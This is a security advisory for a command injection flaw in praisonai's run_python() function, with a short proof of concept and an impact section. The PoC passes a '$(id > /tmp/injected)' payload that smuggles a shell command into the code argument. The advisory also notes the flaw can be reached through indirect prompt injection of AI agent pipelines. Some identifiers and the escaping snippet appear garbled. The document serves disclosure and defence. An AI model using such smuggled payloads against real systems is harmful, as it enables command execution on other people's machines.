PT-2026-59585 · Pypi · Praisonaiagents

Publicado

2026-07-13

·

Atualizado

2026-07-13

CVSS v3.1

7.8

Alta

VetorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

run python() in praisonai constructs a shell command string by interpolating user-controlled code into python3 -c "<code>" and passing it to subprocess.run(..., shell=True). The escaping logic only handles `` and ", leaving $() and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked.

Details

execute command.py:290 (source) -> execute command.py:297 (hop) -> execute command.py:310 (sink)
python
# source -- user-controlled code argument
def run python(code: str, cwd=None, timeout=60):

# hop -- incomplete escaping, $ and () not handled
  escaped code = code.replace('', '').replace('"', '"')
  command = f'{python cmd} -c "{escaped code}"'

# sink -- shell=True expands $() before python3 runs
  return execute command(command=command, cwd=cwd, timeout=timeout)
  # execute command calls subprocess.run(command, shell=True, ...)

PoC

python
# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30)
# install: pip install -e src/praisonai
import sys
sys.path.insert(0, 'src/praisonai')
from praisonai.code.tools.execute command import run python

result = run python(code='$(id > /tmp/injected)')
print(result)

# verify
import subprocess
print(subprocess.run(['cat', '/tmp/injected'], capture output=True, text=True).stdout)
# expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...

Impact

Any agent pipeline or API consumer that passes user or task-supplied content to run python() is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with AUTH ENABLED = False by default when no token is configured.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-2954

Produtos afetados

Praisonaiagents